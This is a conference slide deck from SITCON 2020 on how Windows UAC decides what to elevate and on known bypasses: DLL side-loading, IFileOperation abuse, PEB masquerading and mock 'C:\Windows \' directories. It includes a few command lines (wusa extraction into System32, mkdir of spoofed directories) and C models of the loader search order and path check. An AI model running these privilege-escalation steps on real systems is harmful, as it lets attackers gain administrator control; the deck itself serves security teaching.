Slide 1

Slide 1 text

SITCON 2020: Playing Win32 Like a K!NG ;) aaaddress1@chroot.org (title slide; the background is a decorative collage of truncated PowerShell and shellcode fragments)

Slide 2

Slide 2 text

#Windows #Reversing #Pwn #Exploit $man
• Master's degree at CSIE, NTUST
• Security Researcher - chrO.ot
• Speaker - BlackHat, DEFCON, VXCON, HITCON
• aaaddress1@chroot.org
• Hao's Arsenal

Slide 3

Slide 3 text

aaaddress1@chroot.org /?outline
1. UAC Design
2. Exploit Attacks
  1. Misc Method
  2. CIA Vault7: Elevated COM Object Method
  3. UAC Bypass by Mocking Trusted Directories
3. Recap

Slide 4

Slide 4 text

aaaddress1@chroot.org 〉〉〉UAC Design

Slide 5

Slide 5 text

aaaddress1@chroot.org /?UAC

Slide 6

Slide 6 text

aaaddress1@chroot.org /?UAC

Slide 7

Slide 7 text

Diagram (UAC design): Ring3 above, Ring0 below the syscall boundary. Explorer (A.) RunAs → (B.) sends a task by RPC message to the UAC service for creating a child process with a different privilege; inside the service the flow drawn is RPC → trust_authA → consent.exe → trust_authB → privileged child process.

Slide 8

Slide 8 text

aaaddress1@chroot.org /?auth_a
• TrustAuth_A # trust path verify
  - $p = ToDosName("C:\\a.exe") # \??\C:\a.exe
  - $p.startswith(\??\C:\Windows\System32) or $p.startswith(\??\C:\Windows\SysWoW64)
  - deny-list

Slide 9

Slide 9 text

aaaddress1@chroot.org /?auth_b
• TrustAuth_B
  - whitelisted *.exe with M$ signature
  - or AutoElevate marked as TRUE in manifest.xml

Slide 10

Slide 10 text

aaaddress1@chroot.org /?Bypass
• UAC: what the emperor does not grant, you cannot take!
• TrustAuth_A # binary from the trusted zone?
  A. launched from the system directory
  B. whitelisted + signed by M$
• TrustAuth_B # should be elevated?
  C. marked as auto-elevated or whitelisted
PS C:> sigcheck.exe -m C:\Windows\System32\Taskmgr.exe
So now... we have a nice little list of targets

Slide 11

Slide 11 text

aaaddress1@chroot.org /?attack
• Misc: assorted tricks seen in the wild ✨
• CIA: Elevated COM Object Method
• Mocking Trusted Directories

Slide 12

Slide 12 text

aaaddress1@chroot.org /?misc#1 Accessing Access Tokens for UIAccess www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html Click "Yes" on the prompt for you automatically? It's the least we can do.

Slide 13

Slide 13 text

aaaddress1@chroot.org /?misc#2
• So can we get a high-privilege service to call us directly?
• Bypassing UAC on Windows10 using Disk Cleanup enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup

Slide 14

Slide 14 text

aaaddress1@chroot.org /?misc#3
• Extract an archive straight over the system program files
$ wusa hack.cab /extract:C:\windows\system32
msitpros.com/?p=3100

Slide 15

Slide 15 text

aaaddress1@chroot.org 〉〉〉IFileOperation

Slide 16

Slide 16 text

aaaddress1@chroot.org /?RunAs consent.exe

Slide 17

Slide 17 text

aaaddress1@chroot.org /?fileCopy

Slide 18

Slide 18 text

aaaddress1@chroot.org /?alert

Slide 19

Slide 19 text

aaaddress1@chroot.org /?hijack
Diagram (DLL hijack): C:\hijack\a.exe as a PE file ('PE' signature, optional header with EntryPoint and ImageBase, sections .text/.rdata/.idata); once running, the process PEB lists the loaded modules (ntdll.dll, VERSION.dll, user32.dll, ...). LoadLibrary() walks the search path in order: { "C:\hijack\VERSION.dll", "C:\Windows\System32\VERSION.dll", "C:\Windows\SysWoW64\VERSION.dll", ... }, so the copy next to a.exe wins.

Slide 20

Slide 20 text

aaaddress1@chroot.org /?bypass#1
• DLL Side-Loading → hijack auto-elevated Windows services by dropping a malicious *.dll binary
• IFileOperation → arbitrary file write if you're Explorer → drop a *.dll into C:\windows\system32 to hijack
• DLL Injection → do things as Explorer
https://github.com/hjc4869/UacBypass

Slide 21

Slide 21 text

Diagram (/?bypass#1): the malware targets system32\cliconfg.exe through explorer.exe. Inside the explorer.exe process (modules ntdll.dll, kernel32.dll, user32.dll, malware.dll): (a.) inject the *.dll module; (b.) create a new thread to wake the malware up; (c.) drop a *.dll into %system32% to hijack the service; (d.) get privileged via the DLL hijack.
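Slides 19 to 21 rely on the loader's search order: a DLL that the auto-elevated EXE asks for by name is taken from the first directory in the order that has a file of that name, and a name that exists nowhere is free for the taking once you can write into one of those directories. The following C is an added example, not code from the slides or from Windows. It models the default search order (EXE directory, System32, Windows directory, PATH) over a constructed table of "existing" files, and also models the KnownDLLs rule that a DLL on that list is always mapped from System32 regardless of what sits next to the EXE. The file table, the PATH entries, `plant_file`, `resolve_dll` and the DLL name `missing.dll` (a placeholder; the slides do not name the DLL cliconfg.exe looks for) are this example's own.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_FILES 32
#define PATH_CAP 512

/* Constructed model of the disk: every path that "exists" for the loader. */
static const char *g_files[MAX_FILES] = {
    "C:\\hijack\\a.exe",
    "C:\\hijack\\VERSION.dll",             /* attacker's copy, first in search order */
    "C:\\hijack\\kernel32.dll",            /* planted copy of a KnownDLL: never consulted */
    "C:\\Windows\\System32\\cliconfg.exe", /* auto-elevated target from slide 21 */
    "C:\\Windows\\System32\\VERSION.dll",
    "C:\\Windows\\System32\\kernel32.dll",
};
static size_t g_nfiles = 6;

/* Subset of the KnownDLLs list: mapped from \KnownDlls, never searched on disk. */
static const char *const g_known_dlls[] = { "ntdll.dll", "kernel32.dll", "user32.dll" };

/* PATH entries, searched last (constructed for the example). */
static const char *const g_path_dirs[] = { "C:\\Tools" };

/* Case-insensitive string equality, as NTFS treats names. */
static bool ieq(const char *a, const char *b)
{
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return false;
    return *a == *b;
}

static bool file_exists(const char *path)
{
    for (size_t i = 0; i < g_nfiles; i++)
        if (ieq(g_files[i], path))
            return true;
    return false;
}

static bool is_known_dll(const char *name)
{
    for (size_t i = 0; i < sizeof g_known_dlls / sizeof *g_known_dlls; i++)
        if (ieq(g_known_dlls[i], name))
            return true;
    return false;
}

/* Step (c) of slide 21: whoever can write as Explorer drops a DLL.
   `path` must be a string literal or otherwise outlive the table. */
bool plant_file(const char *path)
{
    if (g_nfiles >= MAX_FILES)
        return false;
    g_files[g_nfiles++] = path;
    return true;
}

/* Resolve LoadLibrary("name") for the EXE at exe_path the way the default
   (SafeDllSearchMode) order does, simplified: KnownDLLs short-circuit to
   System32; otherwise the EXE's own directory, System32, the Windows
   directory, then PATH. Returns a static buffer, or NULL when no copy
   exists anywhere, which is exactly the gap a hijacker fills. */
const char *resolve_dll(const char *exe_path, const char *dll_name)
{
    static char out[PATH_CAP];
    char appdir[PATH_CAP];
    const char *dirs[3 + sizeof g_path_dirs / sizeof *g_path_dirs];
    size_t ndirs = 0;

    if (is_known_dll(dll_name)) {
        snprintf(out, sizeof out, "C:\\Windows\\System32\\%s", dll_name);
        return out;
    }

    const char *slash = strrchr(exe_path, '\\');
    size_t len = slash ? (size_t)(slash - exe_path) : 0;
    if (len >= sizeof appdir)
        len = sizeof appdir - 1;
    memcpy(appdir, exe_path, len);
    appdir[len] = '\0';

    dirs[ndirs++] = appdir;
    dirs[ndirs++] = "C:\\Windows\\System32";
    dirs[ndirs++] = "C:\\Windows";
    for (size_t i = 0; i < sizeof g_path_dirs / sizeof *g_path_dirs; i++)
        dirs[ndirs++] = g_path_dirs[i];

    for (size_t i = 0; i < ndirs; i++) {
        snprintf(out, sizeof out, "%s\\%s", dirs[i], dll_name);
        if (file_exists(out))
            return out;
    }
    return NULL;
}

int main(void)
{
    const char *exe = "C:\\Windows\\System32\\cliconfg.exe";
    const char *hit = resolve_dll("C:\\hijack\\a.exe", "VERSION.dll");
    printf("a.exe loads VERSION.dll from %s\n", hit);
    hit = resolve_dll(exe, "missing.dll");        /* hypothetical DLL name */
    printf("before drop: %s\n", hit ? hit : "(not found: hijackable)");
    plant_file("C:\\Windows\\System32\\missing.dll");
    printf("after drop : %s\n", resolve_dll(exe, "missing.dll"));
    return 0;
}
```

The model leaves out the 16-bit system directory and the current directory, and it does not model the loader's manifest or redirection logic; the two behaviours it keeps are the ones the slides depend on: the EXE's own directory is consulted before System32, and a KnownDLL is never taken from there, which is why VERSION.dll is a usable hijack name next to a.exe while kernel32.dll is not.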

Slide 22

Slide 22 text

aaaddress1@chroot.org /?bypass4what
• Change the Windows product key → the hacker can install a genuine Windows for you!
• Run the disk management tools → PC slow, too much junk? The hacker will tidy up your disk for you
• Remove your antivirus for you → think the AV makes your PC slow? No problem, the hacker will delete it for you (⁎⁍̴̛ᴗ⁍̴̛⁎)
• Write autorun entries → the hacker can plant a backdoor that runs at boot and watches over you ;)

Slide 23

Slide 23 text

aaaddress1@chroot.org /?MasqueradePEB
Diagram (MasqueradePEB): Source.cpp → Compiler → PE file ('MZ' / 'PE' headers, optional header with ImageBase and EntryPoint, sections .text/.rdata/.idata) → Application Loader → running process. The process PEB records the image path of the PE module, here masqueraded as "C:\Windows\explorer.exe".

Slide 24

Slide 24 text

aaaddress1@chroot.org /?bypass#2
• DLL Side-Loading → hijack auto-elevated Windows services by dropping a malicious *.dll binary
• IFileOperation + MasqueradePEB → arbitrary file write as Explorer → drop a *.dll into C:\windows\system32 to hijack

Slide 25

Slide 25 text

Diagram (/?bypass#1): the malware targets system32\cliconfg.exe through explorer.exe. Inside the explorer.exe process (modules ntdll.dll, kernel32.dll, user32.dll, malware.dll): (a.) inject the *.dll module; (b.) create a new thread to wake the malware up; (c.) drop a *.dll into %system32% to hijack the service; (d.) get privileged via the DLL hijack.

Slide 26

Slide 26 text

Diagram (/?bypass#2): the malware.exe process (modules ntdll.dll, kernel32.dll, user32.dll) targets system32\cliconfg.exe directly: (a.) masquerade the current path in the PEB as "C:\Windows\explorer.exe"; (b.) drop a *.dll into %system32% to hijack the service; (c.) get privileged via the DLL hijack.

Slide 27

Slide 27 text

aaaddress1@chroot.org Vault 7: CIA Hacking Tools Revealed /?WikiLeaks wikileaks.org/ciav7p1/cms/page_3375231.html

Slide 28

Slide 28 text

aaaddress1@chroot.org /?IFileOperation http://d1iv3.me/2017/08/11/Bypass-UAC-方法研究/

Slide 29

Slide 29 text

aaaddress1@chroot.org /?IFileOperation http://d1iv3.me/2017/08/11/Bypass-UAC-方法研究/

Slide 30

Slide 30 text

aaaddress1@chroot.org /?IFileOperation http://d1iv3.me/2017/08/11/Bypass-UAC-方法研究/

Slide 31

Slide 31 text

aaaddress1@chroot.org Vault 7: CIA Hacking Tools Revealed /?WikiLeaks wikileaks.org/ciav7p1/cms/page_3375231.html M$ patched this vulnerability after Windows 10 version 1607 (the fix also covers the known *.dll names that enabled the hijack)

Slide 32

Slide 32 text

aaaddress1@chroot.org Vault 7: CIA Hacking Tools Revealed /?WikiLeaks wikileaks.org/ciav7p1/cms/page_3375231.html M$ patched this vulnerability after Windows 10 version 1607 (the fix also covers the known *.dll names that enabled the hijack)

Slide 33

Slide 33 text

aaaddress1@chroot.org 〉〉〉Mocking Directory

Slide 34

Slide 34 text

Diagram (UAC design, repeated): Ring3 above, Ring0 below the syscall boundary. Explorer (A.) RunAs → (B.) sends a task by RPC message to the UAC service for creating a child process with a different privilege; inside the service the flow drawn is RPC → trust_authA → consent.exe → trust_authB → privileged child process.

Slide 35

Slide 35 text

aaaddress1@chroot.org /?Bypass
• UAC: what the emperor does not grant, you cannot take!
• TrustAuth_A # binary from the trusted zone?
  A. launched from the system directory
  B. whitelisted + signed by M$
• TrustAuth_B # should be elevated?
  C. marked as auto-elevated or whitelisted
PS C:> sigcheck.exe -m C:\Windows\System32\Taskmgr.exe
So now... we have a nice little list of targets

Slide 36

Slide 36 text

aaaddress1@chroot.org /?DACL

Slide 37

Slide 37 text

aaaddress1@chroot.org /?DACL

Slide 38

Slide 38 text

aaaddress1@chroot.org /?DACL
$ mkdir "C:\Windows \"
$ mkdir "C:\Windows \System32"

Slide 39

Slide 39 text

aaaddress1@chroot.org /?auth_a
• TrustAuth_A # trust path verify
  - $p = ToDosName("C:\\a.exe") # \??\C:\a.exe
  - $p.startswith(\??\C:\Windows\System32) or $p.startswith(\??\C:\Windows\SysWoW64)
  - deny-list

Slide 40

Slide 40 text

aaaddress1@chroot.org /?auth_a
AiLaunchProcess(L"C:\Windows \System32\a.exe")
RtlDosPathNameToRelativeNtPathName_U_WithStatus( GetLongPathNameW(L"C:\Windows \System32\a.exe") )
= RtlDosPathNameToRelativeNtPathName_U_WithStatus( L"C:\Windows\System32\a.exe" )
$p = L"\??\C:\Windows\System32\a.exe"
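Slides 8 and 40 together describe the trust_authA path check and the normalisation step that defeats it: the service canonicalises the requested path with GetLongPathNameW before checking it, while the process is still created from the path the caller supplied, so the directory made by `mkdir "C:\Windows \"` on slide 38 passes as C:\Windows. The following C is an added example, not code from the slides or from Windows: `trust_auth_a` is the slide 8 pseudo-code written out, and `win32_canonicalise` stands in for the GetLongPathNameW resolution on slide 40 by emulating the Win32 rule that trailing spaces and dots of a path component are discarded when the component is looked up. The function names, buffer sizes and sample paths are this example's own.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define PATH_CAP 512

/* Case-insensitive prefix test; NTFS paths are case-insensitive. */
static bool starts_with_ci(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return false;
    return true;
}

/* The slide's ToDosName(): a DOS path in NT form, "\??\C:\...".
   Nothing is canonicalised here; only the prefix is added. */
static const char *dos_to_nt(const char *dos)
{
    static char nt[PATH_CAP];
    snprintf(nt, sizeof nt, "\\??\\%s", dos);
    return nt;
}

/* trust_authA from slides 8/39: does the image live under System32 or
   SysWoW64? The separator is part of the prefix so that a sibling such as
   C:\Windows\System32X\ cannot match. */
bool trust_auth_a(const char *dos_path)
{
    const char *nt = dos_to_nt(dos_path);
    return starts_with_ci(nt, "\\??\\C:\\Windows\\System32\\") ||
           starts_with_ci(nt, "\\??\\C:\\Windows\\SysWoW64\\");
}

/* Model of what GetLongPathNameW returns on slide 40: every component is
   resolved by lookup, and the lookup drops trailing spaces and dots, so
   "C:\Windows \System32" comes back as the real "C:\Windows\System32".
   Returns a static buffer. This is an emulation, not a Windows call. */
const char *win32_canonicalise(const char *in)
{
    static char out[PATH_CAP];
    size_t n = 0;
    const char *p = in;

    while (*p && n + 1 < sizeof out) {
        const char *end = strchr(p, '\\');              /* end of this component */
        size_t len = end ? (size_t)(end - p) : strlen(p);
        while (len > 0 && (p[len - 1] == ' ' || p[len - 1] == '.'))
            len--;                                       /* drop trailing ' ' and '.' */
        if (n + len + 1 >= sizeof out)
            break;
        memcpy(out + n, p, len);
        n += len;
        if (end) {
            out[n++] = '\\';
            p = end + 1;
        } else {
            p += strlen(p);
        }
    }
    out[n] = '\0';
    return out;
}

/* AiLaunchProcess as drawn on slide 40: canonicalise, then run trust_authA
   on the canonical path, while the child is created from requested_path. */
bool launch_path_passes_trust_a(const char *requested_path)
{
    return trust_auth_a(win32_canonicalise(requested_path));
}

int main(void)
{
    const char *mock = "C:\\Windows \\System32\\a.exe";  /* the mkdir trick of slide 38 */
    printf("raw       : %s -> %s\n", mock,
           trust_auth_a(mock) ? "trusted" : "denied");
    printf("canonical : %s -> %s\n", win32_canonicalise(mock),
           launch_path_passes_trust_a(mock) ? "trusted" : "denied");
    return 0;
}
```

The two results for the same input are the whole bug: checked raw, "C:\Windows \System32\a.exe" is denied; checked after canonicalisation, it is trusted, yet the binary that then runs is the one in the attacker's mock directory. The defensive lesson is the general one for any path-based trust decision: verify the object you actually open (the opened handle's real path), not a string you normalised separately.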

Slide 41

Slide 41 text

aaaddress1@chroot.org • TrustAuth_A - Path Normalization Issues • TrustAuth_B - Whitelisted EXE Files with Trusted Signature - AutoElevated Marked EXE Files → DLL Side-Loading Tricks to hijack windows services • UAC Bypass by Mocking Trusted Directories /?attack

Slide 42

Slide 42 text

aaaddress1@chroot.org 〉〉〉Recap

Slide 43

Slide 43 text

aaaddress1@chroot.org /?HITCON www.youtube.com/watch?v=6LUo-Crd9pc

Slide 44

Slide 44 text

aaaddress1@chroot.org /?recap
• UAC Design
  - auth_a: *.exe launched from the system directory
  - auth_b: marked as AutoElevated
• Bypass Tricks
  - Issue: IFileOperation, Path Normalization
  - DLL Side-Loading
  - Code Inject / MasqueradePEB
  - DEFCON 25: UAC 0day, all day! by @FuzzySec

Slide 45

Slide 45 text

aaaddress1@chroot.org /?HITCON

Slide 46

Slide 46 text

Thanks! Slides: Github @aaaddress1 · Facebook · aaaddress1@chroot.org (closing slide; the background is a collage of keywords, including universal hijacking, local privilege escalation, intelligence infiltration, cross-level injection, remote backdoor and cyber-army operations, plus truncated PowerShell fragments)